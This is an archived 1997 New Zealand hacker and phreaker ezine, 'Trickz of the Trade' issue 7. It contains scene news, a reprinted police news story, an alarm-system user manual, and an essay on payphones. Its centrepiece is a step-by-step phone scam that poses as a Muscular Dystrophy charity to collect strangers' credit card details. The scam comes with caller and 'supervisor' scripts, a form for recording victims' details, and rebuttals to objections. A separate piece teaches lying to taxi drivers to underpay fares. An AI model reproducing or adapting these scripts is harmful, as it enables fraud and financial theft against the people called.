Copy Link
Add to Bookmark
Report

Trickz of the Trade 07

eZine's profile picture
Published in 
Trickz of the Trade
 · 20 Nov 2023

  _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _ 
- |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| -




...after months of fucking around







ÜÜÛß ßÛÜ
Ü²ß ÞÝ ß²Ü
²² °ÝÞÝ ²±
±² °Ý Þ° ±±
Þ±Ý ±° ±° ±° ÜÜ
±± Þ°Ý °± ÜÜÜßß
Þ°Ý °Þ Þ°Ýß Þ°Ý
Þ°Ý Þ±ÝÜÜßß ±± °±
ÜÜÜßß±± Þ±Ý ±°
ÜÜßß Þ° Þ²Ý ²± Þ±
±Ý²² Þ²Ý ±Ý
²²Ý ²²Ü°
Û ÝÜÜ ÜÜÞ²±
ÞÝ ßß±° ±ßß Û
Þ Þ

- aNARCHY iN tHE nZ -
= is proud to present =







ÞÞÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÜ ÛÛÛÜ ÛÛÛÛ ÞÛ
ÜÜ ÜÜ ÜßßßÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÜÜÞÛÛÛÜ ÞÛÛÛÛ ÛÛÛ
ÜÜÛÛÛßÛßÜßßß ÞÛÛßßÛÛÛßßßßÛÛÜÜ ßÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÝ ÞÛÛÛÜ
ÜÜß ÛÛÛßÛÝÜÛß ßß ßßß ßßßÛÛÜ ÜÛÜÜÜÜßßÛÛÛÛÛÛÛÛßÛÛÛÜÛÛÛÛÛ Ý
ßßÛ ÛÜ Ü ßßÛÛÜ ÜÜÜ ÜÛÛÛÛÛßßÜÜÜÜßßÛÛÛÛÛÛÜßÛÛÛÛÛÛÛ ÛÝ
ÛßÛÜ ÛÛÝ ßßÜÛÛÛßÜÛÛÛßßÜÜÛÛÜÜßßÜÜÜÜßÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÝ
ß Û ÛÛÝ tRICKZ ÛÛÛÛßÜÛÛÛ ÛÛÜÛÛÛÛÜÛ ÛÛÛÛÜÜßÛÛÛÛ ÛÛÛÛÛÛÛÛÛÝ
Ü ÝßÛÛÛÝ oF tHE ÞÛÛÛÝÞÛÛÛ ÛÛÛÛÛÛÛÛÛßÜÜÛÛÛÛÛÜÜßÛÛÛ ÛÛÜßÛÛÛÛÝ
ÛÛÜ tRADE! ÞÛÛÝÞÛÛÛÝÞÛÛÛÛÛÛÛÛßÜÜÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÝÞÛÛßÜÛ
ÛÞÝ Ü ,__, ßßÜÛÛÛÛÛ ÛÛÝ ÛßÜÜÛÛÛÛÛÜßßÛÛÛÛ ÛÛÛÛÛÛÞÛÛÛÛÛ
ÛÜÛÜÜ \qp/ ÜÛÛÛÛÛß ÜÜÜßß ÜÜÛßßßßßßßÛÝÞÞÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ
ÝÛÛÜÛß (_<>_) ÞÛÛÛÛÛÝ ßÛÛÛÛÛÛÛßÜßßÜÜÜ Ü Û ÛÛÛÛÝÝÞÛÛÛÛÛÛÛÛÛÛ
ÝÛÝ ÛÝ || ÞÛÛÛÛÛÝ ßßßÛÛÜÜßÛÜÜÜßßÛÛÛ ÞÝÞÛÛÛÝÝÞÛÛÛÛÛÛÛÛÛÛ
Û Ûß ÛÛÜ || ÛÛÛÛÛÛÜÜÜ ßß ÜÜÜßÛÜÜÜÜÜÜÛÛÛÛÛÛÝÝÞÛÛÛÞÛÛÛÛÛÛ
Û ÛÝ ÛÜ `Issue ßÛÛÜßßÛÛÜÜÜÜÜÛÛÛÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÝÞÛÛÛÛÛß
ÞÝÛ ßÛ ÛßÜ #o7. ßÛÜÜÜ ßßß ßßÛÛÛÛÛÛÛÛÛÛ ÛÛßÜÛÛßÛß
ÛÞ ÛÛÛÞ Û Û : ßÛÛÛÜÜÜ ßÛÛÛÛÛÛÛÛ ÛßßÛ ß
ÜÜÛÝÞ ÞÛÛÛÛßÛÜ `. ßÛÛÛÜÜ ÞÛÛßÛÛÛÛÛÜÜ
ßþ ÛÛÛÛ ÛÛ ÛÛÛÛÜßßÜ ßß ßßÛÛ ßÛßßÜÜÛß ÞÛÛßßÛÛÛÛÛÛÝ
ßÛÛÜ ÜÜÛÛÛ ÜÜßÛ ÛÛÛ ÛÛÛÛ ÜÛÛÜ ÜßßÜ ßßßßßßß ÞÛÝÞÛßÛßßßÜÜß ßßßßßß
ÛÜßÛÛÛÛÛÜß Ü ÛÜÜßÛÛ ÜÜÛÜÛÛßßßÛÛÛßÜßÜßßßßß ÞÛ ÛÛÛÞÜÛÛß ÜÛßß ÜÜÜ Ü ÜÜ
ÜÛÜÛÛÜÛÜ ÛÛÛßßÛÛÜßÛÜÜ ßÜÛÛÛÜÜÛÛÛÛÛÛÛÛßÜÛ ÜÜÜÜ Û ÛÛßÜßÜÜÜÜ ÛÛ ÜÛÛßß ÜÛÛß ÜÜÜÜÜ










_______________________ _ _ __ __ _ _ __________________________
\______________________\\\_\\_\_\/_/_//_///_________________________/

tHIS zINE wHICH wE cALL tRICKZ oF tHE tRADE iS oNLY fOR iNFORMATIONAL
pURPOSEZ oNLY,. sO iF yOU dECIDE tO uSE tHE iNFORMATION, gO aHEAD iTZ
a fREE wORLD *bUT* iF sOME cOMPANY fUCKZ yOU oVER bIG-tIME tHEN tHATZ
yOUR fAULT nOT mINE, sO jUST bECAREFUL wHAT yOU dO aND wHAT yOU sAY!!

i n f o r m a t i o n a l p u r p o s e z o n l y

---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
_______________________ _ _ __ __ _ _ __________________________
\______________________\\\_\\_\_\/_/_//_///_________________________/








___________ _______________
. /~~~~~~~~~~/` _ `.
/ _\/_ .
( \/\/ !
\ _________, |
\_/ ! |
____.' | |
// | |
/ | |
. | |
| |
| |
| `
' `--.
' \
: 30/08/97 .
| . . !
| | ! ! |' '
| | | | | /
`--|__|__| |-'
| |
| |
!__|





.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "
POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"
OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO ToT '"
OOOOOOOOOOOOOOOO"` ToT oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"
` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"
OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"
%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"
%OOOO%"%OOOOO"OOOOOO"OOO':
`$"
`OOOO' `O"Y ' `OOOO' o .
. . OP"
: o .
-MiNDRAPE '95
CONTENT'Z:
0.. DNiC.EXE SEQU.EXE dea)(alm
1.. SCENE NEWZ ][yPe
2.. CREDiT CARD SCAM ][yPe
3.. HALF $$$ TAXi RiDEZ ][yPe
4.. NZ Hi-TECH CRiME dea)(alm
5.. COUNTESS USER iNFO dea)(alm
6.. FUTURE OF PAYPHONES dea)(alm
7.. iNTEL REVENGE Mutant-X
8.. MOTHERFUCKER MAiLFLOOD PoSCa
9.. WHO'S THAT PHREAK? bAD L
10. THE CC-KEY TRiCK bAD L
11. FRAUD DETECT SYSTEM bAD L
12. iNTERNET FOR FREE bAD L
13. THE CHEWiE PoSCa
14. HACKiNG ANNEX SYSTEMS Iceman
15. HACKiNG AM'S ][yPe
16. RETAiL SCAMMiNG oPium
17. ELiTE BOXiNG METHOD ][yPe
18. VMB LOOP HOLES ][yPe
19. FAKE iD'Z oPium
20. CYBERSPACE ][yPe
21. GREETZ ][yPe
22. LAST WORDZ ][yPe







_____/\__/\__/\__/\__/\__ ________[/ 0 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // DNiC.EXE SEQU.EXE! \\ \ \ \ \ \---'
`--/---/---/---/---//-----= by dea)(alm =------\\---\---\---\---\--'

In the ToT #7 archive there should be DNIC.EXE, this program will generate
a DNIC listing and order it according to Country name, Network or DNIC
number.

The DNIC.EXE takes up 39k, it was written in Quick Basic 4.5 and it
requires a colour monitor.

If you cannot use the executable for any reason here is the DNIC list
ordered by Country name. Acknowledgements for this list go to Telecom
New Zealand - they supplied it to me.

Refer to DNIC.TXT for plain list

Also in the archive there is a file SEQU1.EXE, this program is a phunky
number sequentiometer and safe war-dialing program! Check out the text
included SEQU.TXT


_____/\__/\__/\__/\__/\__ ________[/ 1 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // SCENE NEWZ! \\ \ \ \ \ \---'
`--/---/---/---/---//------= by ][yPe! =-------\\---\---\---\---\--'

h3y! h3y! Were back dewdz! yeaah ToT #7 in your face!.. hope you njoy this
issue, any comments or feedback mail me at qwid@mulysa.gen.nz or you could
find me on iRc and have a chat. `kay scroll away now

Below is the scene newz since the last release of ToT..

[*] tRICKZ oF tHE tRADE can be leeched from:
http://www.giga.or.at/pub/hacker/zines/TOT/
ftp://ftp.giga.or.at/pub/hacker/zines/TOT/
ftp://ftp.fc.net/pub/defcon/TOT/

[*] Ceo quit, too busy working on projects for Telco

[*] Twisted^Symmetry is now known as dea)(alm

[*] ToT Homepage will be opening up soon

[*] Telecom describes Quicktips as "independent, unbiased" information.
NZ Consumer magazine isn't very impressed with the Quicktips.
0800 500 TIP (0800 500 847)

[*] There are new 0900 914 XXX telecom 0900 numbers, they can be found in
the Yellow Pages

[*] Some anonymous dudes from Argentina were busted for pbx and bb fraud

[*] Novell has reached settlements worth $1.3 million with five computer
resellers and two individuals accused of selling upgraded software as
new products

[*] Ameritech started providing digital cellular telephone service here
using code-division multiple access (CDMA) technology to more than
13,000 Ameritech cellular customers that had been previously on
Ameritech's analog

[*] A 21-year-old Illinois man was arrested after threatening to kill
Microsoft chairman Bill Gates and his wife unless they paid him $5
million

[*] Finjan's software aims to keep out security threats that hide in Java
and other code

[*] Some 500 citicorp employees in Los Angeles are testing equipment that
that scans bank customers' eyes to confirm their identity before letting
them use an ATM

[*] Ice BBS in +643 (Christchurch, New Zealand) was investigated by the
Department of Internal Affairs. The BBS which was inactive at the time
of investigation, had a file area called "Illegal Files". Users were
required to register and send money before they received access - you
won't believe the number of failed blackmail attempts. Internal Affairs
came and took the sysop's hard disk and said they weren't going to give
it back. No charges have been laid.


_____/\__/\__/\__/\__/\__ ________[/ 2 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // CREDiT CARD SCAM \\ \ \ \ \ \---'
`--/---/---/---/---//------= by ][yPe! =-------\\---\---\---\---\--'

iNTRO TO SCAMMiNG CREDiT CARDZ
~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`
Before i start off let me just say the following involves alot of social
engineering skills (telemarketing) and if you havent done any social
engineerin before then fucken learn coz its a phun experience and it can
be very useful to phreakerz..

BTW: I have NEVER ever seen anyone write bout this type of scam.. so its
quite unique and very EFFECTIVE!!! next issue i might include a better
(new) script so that you can get cc's on your first couple of callz not
20/30 calls later!

Hey make sure you read the WHOLE article to understand the WHOLE procedure
trust me it will be worth it.. this scam can take up to an hour, but its not
that boring once you got the hang of it! so never give up, eventually you
run into some stupid person that falls for the plague!!! muhahah

WHY iS SCAMMiNG CC'Z USEFUL?
~`"
'~`"'~`"'~`"'~`"'~`"'~`"'
This can be used as a great way of revenge on someone you know with a
credit card aswell as the following..

Lame but effective way of scoring credit cardz with FULL fucking details
(hint-hint: PWL, MCi, Carding etc) simple as hell, you could do this from
home if you really want too (i dont recommend it, explained later) when i
first tried this not-so-bad method of collecting people's credit cardz i
was sitting in the bushes pillboxing with B.L at around 9pm (which isnt a
safe time to do it, but anyway...)

ANY REQUiREMENTZ?
~`"'~`"'~`"'~`"'~
Yup, a PEN and PAPER to write down their card details and make sure you
talk clearly, no fucken dull voices and try to sound like your not reading
any scripts its better that way and dont go too fast!

Also have a friend with you to pretend to be your SUPERVISOR, just to make
the scam look real.. so you need the other person to take the phone off you
and take the victim's card number, expiry date once they have fallen for
the scam!!!

HOW DOES iT WORK?
~`"'~`"'~`"'~`"'~
Ok now to the real point! Pick a list of surnames from the phone book..
eg: Simpson.. now all you gotta do is ring each Simpson till you find some
dumb Simpson that falls for our little cheap scam, Ok There are hundred's
of ways you can do this phone scam, today its the Muscular Dystrophy one
where you ring up and ask for donations of $15 or $20 which goes to the
kids that are suffering from Muscular Dystrophy. Oh yeah i almost forgot
to say since some people dont have Credit Cardz they will say "Could you
send me a sae (self addressed envelope) and i can send in my donation"

If they say that then reply "Yes certainly Mr/Mrs Simpson" ok got it.. the
nicer you talk the better.. (oh you dont send them NOTHING unless you have
a PO.BOX you can give them to send in donations) lucky bastard;)

WHERE CAN i DO THiS SHiT?
~`"'~`"'~`"'~`"'~`"'~`"'~
k, i dont know bout overseas but now in NZ whenever you use a cardphone to
make LOCAL callz it costs 50c for the entire call, which isnt too bad so
yeah please do this scam from a cardphone or cellphone, cocots etc..
I dont recommend you use a pbx to call your victim.. especially from home

WHY CANT i DO THiS FROM HOME?
~`"'~`"'~`"'~`"'~`"'~`"'~`"'~
"
Because you just cant" only a lamer that wants to be fucked up the ass by
Telco Risk Management would do this shit from their house.. reasons not to
do scamming/social engineerin from home..

A> When the owner of the CC recieves their bill and notices extra $$$ used
up they will run a complaint immediately and the police will trace back
to that day you made the call..

B> If the victim is suspicious about the catch, yeah they do say that..
"
so whats the catch" they will call the police after the call was made
and you'd be fucked no matter what you say!

C> "
Always use the outside phone" - GoodFellas

WHEN CAN i START?
~`"
'~`"'~`"'~`"'~
Now!;) You can do this ANY TIME of the day but no later than 9pm coz i think
its a bit stupid if you call while they are asleep or somthin (yeah some
fuckwits do go to sleep that early!)

I recommend you cut out the scripts below with some text editor and print
them out, it makes things easier when it comes to doing the scam, or just
press 'p' if your viewing this through the k00L amiga ToT loader;)


[SCRiPT]*****************************************************************

Good afternoon/evening Mr/Mrs [SURNAME] How are you?

That's Brilliant, now my name is [FAKE NAME] calling from S.O.S
and i am calling to bring you the great news that you can receive $500
worth of Dining, Entertainment & Business discount vouchers and also a
good chance of FREE hotel and motel accommodation all around [COUNTRY]
for one year in the great [COUNTRY] Getaway draw.

Now Mr/Mrs [SURNAME] have you been away on holiday recently?

(await reply)

Well, how would you like to be able to go for FREE for one whole year?

Actually, the nature of these promotions is to help the many [COUNTRY]
children that suffer from Muscular Dystrophy. Are you aware of Muscular
Dystrophy Mr/Mrs [SURNAME]?

Well Muscular Dystrophy is a wasting disease of the muscles, accompanied
by weakness and deformity and tragically there is no cure. It usually
affects children and many of them are confined to wheel-chairs, so its
very sad as you can imagine...

So all we ask for is a small contribution of just $15 or even $20 for
Muscular Dystophy and in return you receive;

1) $500 worth of [TOWN] Restaurant and Business discount vouchers.

2) A Muscular Dystrophy Association brochure,

3) A Tax Deductible receipt - which means you can get one third of your
donation back,

4) And you are entered into the monthly draw for a whole year's worth of
FREE hotel & motel accommodation all around [COUNTRY] - so hows does
that sound Mr/Mrs [SURNAME]?

SO CAN WE COUNT ON YOUR SUPPORT FOR THIS YEAR'S APPEAL?

YES - FANTASTIC, now just hold the line while I put you over to my
supervisor... (Now your friend comes on)


[SUPERVISOR'S SCRIPT]****************************************************

Hi im [FAKE NAME'S] Supervisor..

I just need to take a few details, well we would normally charge the
donation to a credit card, do you have a credit card Mr/Mrs [SURNAME]?

goto <<A>> if YES (yeah you made it)
<<B>> if NO! (sucker try someone else)
<<C>> if NO! (you gotta have your own p.o box for this one)

<<A>>

Ok thats fine..
Could i have your name please?
Home Address?
What sort of Credit Card do you have? Visa/Mastercard?
Your card number?
Expiry date?
The bank you issued your card from?

Thats great and how much could you donate to Muscular Dystropy Mr/Mrs
[SURNAME]? Fantastic! Thank you for your support we will send out the
discount vouchers very soon and you will be entered into the draw for a
whole year's worth of FREE hotel and motel accomodation which is drawn
out on the 1st day of each month in the [NEWSPAPER] Have a nice day
Mr/Mrs [SURNAME], bye


[VICTIM'S DETAIL'S]******************************************************

Bank _______________________________
Card _______________________________
Expiry _________
Type _______________________________ (MC/V/Amex)

Name _______________________________ (you already know their surname)
Address ____________________________
____________________________
____________________________
Country ____________________________
Phone # ____________________________ (you already know this so dont ask)

<<B>>

Thats fine we can send out a courier to pick up the donation and drop
off the $500 worth of Restaurant and Business discount vouchers when
would be a suitable time and day for our courier to come by? Great ok
i need some details your Name? Address? Thank you, we'll see you then.
(DONT GO THERE COZ YOU DONT HAVE ANY FUCKIN VOUCHERS DO YOU!!!)

<<C>>

That's no problem at all, well if you like you could send the donation
to our P.O BOX which automatically goes to the Muscular Dystrophy and
we can send out your vouchers once we have recieved your contribution..
How does that sound Mr/Mrs [SURNAME]? ok great the P.O BOX is (just
give them your po box number if you got one)


[QUESTiONZ/OBJECTiONZ]***************************************************

Sometimes there are several common questions/objections that you will
regularly encounter. Listed below are some suggestions as to how overcome
these;)

Who did you say you worked for?
~`"
'~`"'~`"'~`"'~`"'~`"'~`"'~`"
"
I work for S.O.S (Supporting Our Society)"

What is the phone number your calling from?
~`"
'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"
(You should know by now how to set up your own VMB if not say)
"Sorry I cannot give you that information" or say "0800-999321"

Are you paid or a volunteer?
~`"'~`"'~`"'~`"'~`"'~`"'~`"'
"
I get paid a few dollars an hour for helping out on the phone"

So whats the catch?
~`"
'~`"'~`"'~`"'~`"
"There isnt a catch we are calling people in the local community to see
if anyone can help support the children suffering from Muscular Dystrophy"


I cant afford it at the moment
~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`
"
That's fine Mr/Mrs [SURNAME], when would be an appropriate time to ring
you back? Thank you"

Where did you get my phone number from?
~`"
'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"
"
Telecom directories provided us with your number"

Could you please take my number off the list you have?
~`"
'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`
"Get fucked BITCH/ASSHOLE" (hang up!)

Could i see the $500 worth of vouchers before committing myself?
~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'~`"'
"GET FUCKED BITCH!/ASSHOLE!" (hang up!)


CONCLUSiON
~`"'~`"'~`
Well thats it for SCAMMiNG CC'Z, Next issue i hope to include a nicer
script.. the one i used in this issue isnt very good, cause you get
alot of rejections, but eventually like i said earlier someone will
fall for the scam, even though the victim thinks its for real.. anyway

g00dLuCk d3wdz!!!
~`"'~`"'~`"'~`"'~
If anyone wants to mail me any suggestions for a c0oL3r script, then
pGp your ideas for this article and send them to qwid@mulysa.gen.nz.

My pGp-key is found in article 21. LAST WORDZ


_____/\__/\__/\__/\__/\__ ________[/ 3 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // HALF $$$ TAXi RiDEZ! \\ \ \ \ \ \---'
`--/---/---/---/---//------= by ][yPe! =-------\\---\---\---\---\--'

This works better if you are travelling fair distances for example 15 to
20 km's is fine, so all you do is go up to a taxi on the street or ring
up for one and ask the driver how much it costs to go from where you are
to where you want to go, if the pimp says "about $30" then say "sorry i
only have $15 dollars on me is that alright?"
if the driver is a nice guy
he will say "ok doesnt matter $15 will do" but if he laughs at you and says
"sorry i cant take you that far if you only have $15" then say "please,
because last night i lost my wallet and it had over $100 dollars in there
and at the moment im flat on cash"
the pimp should take you now, but if
he is still refusing to drive you then say "thanks alot you really dont
know what it feels like when you are low on cash and you need a ride!"

The dewd MIGHT take your word, but i normally get away with it, and dont
get that far.. coz whenever i do it i have someone to come with me and we
pay half each of half the normal price, and we make the driver feel sorry
for us until he takes us! works fine, just dont do it too often;)
have phun and dont get caught


_____/\__/\__/\__/\__/\__ ________[/ 4 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // NZ Hi-TECH CRiME \\ \ \ \ \ \---'
`--/---/---/---/---//-----= by dea)(alm =------\\---\---\---\---\--'

Appeared in : The Christchurch Mail. Thursday, February 13, 1997
Title : Frontline cops quit
By line : Anna Price

An estimated 43 police officers in the greater Christchurch area are
expected to quit the job this year under the police disengagement system.
Like the other 217 Christchuch police personnel who have left in the last
seven years under the Police Early Retirement Fund scheme, most are front-
line staff.
Police regional personnel officer Dave Lawry says while a "slight" increase
has been recorded in the exit rate, the full picture is not clearly
reflected in the figures.
Over the last five years, recruits have been signed on under a new
contractual arrangement for 15 years, with a five year renewable clause which
depends on a range of factors such as performance.
The stress of the job with its corresponding disproportionate number of
burn-out casualties was now recognised internationally, Inspector Lawry
said.
Those who leave at the end of the 15 years are automatically entitled to
a cash payout.
"The proportion of staff taking early retirement under the disengagement
system is reducing because fewe personnel are eligible to leave under the
scheme,"
Inspector Lawry said.
The core human resources issue in management would remain the ability to
ensure staff had input and active involvement in the changes.
Police were concerned about the loss of a depth of knowledge and experience
which, he said, may well be difficult to recreate.
However, the newer recruits, many of whom hold tertiary qualifications,
promised to provide a high calibre resource pool for the growing high-tech
nature of police investigations in such areas as computer crime, foreign
languages and logistics, Inspector Lawry said.
"While you have the street-wise and very experienced investigator at the
older level, a new technology is coming on line which will be taken
advantage of by criminal enterprises."

New staff were coming on board with "excellent" computer know-how,
logistics skills and languages to deal with the growing number of ethnic
communities, he said.

Dea) (alM's interpretation for phreaks and hackers:
* The New Zealand Police now have the capabilities to deal with computer
crimes themselves. Previously they got outside experts to do their work
for them.
They will now or soon in the future monitor alt.2600, plus all the
New Zealand computer hacking networks like Resistence, Demi-Monde and SV.
I expect this because full-time police computer-experts won't have very
much to do otherwise.
* Police are recruiting people with computer knowledge (join up hackers).


_____/\__/\__/\__/\__/\__ ________[/ 5 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // COUNTESS USER iNFO \\ \ \ \ \ \---'
`--/---/---/---/---//-----= by dea)(alm =------\\---\---\---\---\--'

There's no special hacking involved in this, these are just the User
Instructions for the Countess alarm system.

Countess
User
Instructions
Page 1 :
INCORRECT ACCESS CODES
----------------------
If three incorrect access codes are entered within five minutes a tamper
fault will be generated.

1. SETTING FULL SYSTEM
-------------------
Enter the allocated four digit user code, the exit/entry warning sounder
will emit a soft continuous tone. Leave by the appointed exit route. The
system will set after the predetermined exit time and the exit/entry
warning sounder will silence. When the system has set only the green mains
light will be lit.

2. SETTING PART SYSTEM
-------------------
Enter the allocated four digit user code. Press the * key followed by the
0 key, the exit/entry warning sounder will emit a low continous tone. The
pre set part guard zone indicators will pulse (omitted). Leave by the
appointed exit route.

If a fault is present when the user code is entered, the sounder will
pulse and the L.E.D. display will indicate the zone or zones in fault.
Clear faults and start again.

3. SETTING WITH INDIVIDUAL ZONES OMMITED
-------------------------------------
Enter the allocated four digit user code, the exit/entry warning sounder
will emit a steady tone. The individual zones may now be omitted, proceed
as follows :-

Press the * key followed by the zone number key. The zone L.E.D. will
pulse indicating zone has been omitted.

The FX zone is omitted by key 6 and the IX zone is omitted by key 5.

Any zones that have been pre programmed for high security may not be
omitted by the above procedures. An error tone will be given.

Leave by the appointed exit route.

Page 2 :
4. SETTING HOME SET SYSTEM
-----------------------
Enter the allocated four digit user code. Press the * key followed by the
6 key, the exit/entry warning sounder will emit a low continuous tone.
The pre set home set zone indicators will pulse (omitted).

If a fault is present when the user code is entered, the sounder will
pulse and the L.E.D. display will indicate the zone or zones in fault.
Clear faults and set mode will not be selected.

In the home set mode any activation to an alarm zone, not a personal
attack zone, will result in a local audible alarm only. Police response
will not occur.

5. TAMPER FAULTS DURING THE DAY
----------------------------
A tamper fault during the day is indicated by the internal sounder along
with the tamper L.E.D.

Enter the allocated four digit user code to silence the internal sounder,
investigate and cure the cause of the tamper alarm. After clearing the
fault, enter the user code and press the # key, this will switch the
control panel on, reset the tamper condition and switch the control panel
back to day mode. If the fault cannot be cleared after the above procedure
has been followed, the tamper L.E.D. will pulse - call the alarm company.

6. RESPONDING TO AN ALARM DURING SET PERIOD
----------------------------------------
Enter the allocated four digit user code to unset the system. The L.E.D.
display will indicate the source of the alarm condition.

To reset the control panel enter the user code and press the # key, this
will switch the control panel on, reset and switch the control panel back
to day mode.

The control panel can only be reset providing the engineer/alarm company
has pre programmed the user reset facility.

7. LINE FAULT
----------
If a digital communicator is fitted to the system and if the telephone
line is faulty the system may or may not be capable of being set,
depending on the programming of the system by the engineer/alarm company.

8. CHIME CONTROL
-------------
The chime is a tone associated with any programmable zone and can be used
to alert the user to any intrusion into a selected area. The chime can be
turned on and off while in day mode as follows :-

To enable chime press the * key followed by the zone number, then the *
key to revert to 'day'.

To disable chime press the * key followed by the zone number, then press
the * key to revert to 'day'.

If a zone has not been pre programmed by the engineer for chime facility,
when the zone number is pressed an error tone will be given and the
control will revert back to day mode.

9. DURESS FACILITY
---------------
The duress can be used as a second presonnel attack facility that is
totally silent. Duress is obtained by entering one number higher or lower
on the first digit of the valid operating codes.

EXAMPLE Valid Code 1-2-3-4 duress codes 0-2-3-4 or 2-2-3-4

If a communicator is connected this will give a direct output to the
central station. The panel can be turned on or off with the duress code,
the display will be suppressed until the second entry of a valid code when
a reset will be required. The duress facility is only available if the
engineer has selected the option during programming.

10.BELL TEST
---------
To test the bell function proceed as follows :-

KEY IN KEY KEY NUMBER CONDITIONS
User code 1 * 9 The L.E.D.s will light
There will be a 10 second pause then
The internal sounder will operater for 5 seconds.
The external bell will operate for 5 seconds.
The strobe (where fitted) will operate for 5 seconds.
The control will then automatically revert back to day mode.

Page 4:
11. SECURITY CODE PROGRAMMING
-------------------------
The control unit has a four digit security code that is programmable only
by first entering the original code, then a menu number as follows:-

KEY IN KEY KEY NUMBER CODE
Factory code * 91 New user code

12. READING LOGS
------------
The Trident includes a logging mode which allows a review of the last
four set and unset modes. With the control panel in the day mode enter
as follows:-

KEY IN KEY KEY NUMBER CODE
User code 1 * 93 A steady tone and the L.E.D.
display indicating the last
set state.

The log is organised as 'SET' and 'UNSET' events. All events are recorded.
The first to alarm is shown by the relevant LED being lit continuously.
Subsequent alarms as shown by a fast pulse of the relevant LED. Any zones
isolated are shown by a slow Pulse on the relevant LED. When this option
is first entered the display will be showing log 1 'SET' state. To display
the 'UNSET' (Day) conditions press the # key. The buzzer will sound whilst
viewing the 'SET' Logs. Any key press error will cause a return to
viewing Log 1 'SET'.

TO VIEW ANY DAY
KEY VIEW KEY VIEW
1 Log 1 'SET' # Log 1 'UNSET'
2 Log 2 'SET' # Log 2 'UNSET'
3 Log 3 'SET' # Log 3 'UNSET'
4 Log 4 'SET' # Log 4 'UNSET'

To exit and return to the day mode press the * key.

13. WALK TEST
---------
KEY IN KEY KEY NUMBER CONDITIONS
User code 1 * 94 A steady tone

The system devices may now be operated, the display will show the
zones operated and a high level sounder will follow the status of the
zone(s) under test.

Note.. The PA or any tamper device may not be tested. An alarm will
result from operation.

To revert back to day mode press the * key.


_____/\__/\__/\__/\__/\__ ________[/ 6 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // FUTURE OF PAYPHONES! \\ \ \ \ \ \---'
`--/---/---/---/---//-----= by dea)(alm =------\\---\---\---\---\--'

Why Telecom's change to a 50c flat rate for local phone calls is bad for
the consumer and better for Telecom's ends.

Telecom has recently introduced a fifty cent flat rate for all local phone
calls made from Telecom pay phones. Telecom say that they have done this so
consumers can talk for much longer and do not have to continue putting
coins into pay phones as they speak, thereby saving consumers money and
giving much better service.

I see it in this way. Telecom are making this move as one of many to
pressure consumers into using phone-cards for pay-phones calls, which will
be an easier transition to a calling-card, which in turn is one more step
closer to an Orwellian, Big Brother society. This is because there will no
longer be the anonymity or privacy of making a phone call from a pay-phone,
they (Telecom and their "friends") will know exactly who you are.

The benefits of anonymous phone calls are many and varied, from heavy
breathing harassment to informational tips to police.

Twenty cents was the amount charged previously for pay phone calls made
locally for a duration of about two minutes. This twenty cent cost was good
as it is much less than the now fifty cent charge and it only allowed for
a short phone call which is what is usually needed. When people make phone
calls from a pay phone it is not to have a social chat, it is to pass on a
short message to someone. For example, a boy will call his parent to ask
them to pick him up from town as he has no bus fare. Or a businessman will
wish to make a short phone call to tell of a timely decision he has made.
This sort of short phone call, which is usually the type pay phones are
used for means that any other people wishing to use the phone will not have
to wait for service.

Most consumers do not have a phone card, when they want to use a pay phone
they walk past the banks of card phones to the one coin phone. They want
to use coins, and when they call their friend they feel the need to talk
much, much longer to get good value from their fifty cents. This means that
other people will be forced to wait much longer to make their call, and
many after repeated frustration of waiting will choose to buy a phone card
and use the available card pay-phones.

After consumers are used to using phone-cards, the transition to a calling-
card will be very easy and few will think of their privacy disappearing. It
follows suit that after everyone with a phone account has a calling-card,
there will be little need for ordinary card or coin phones. Already coin
phones are being phased-out, with few more coin-phones being built and more
card and credit-card phones instead being introduced.

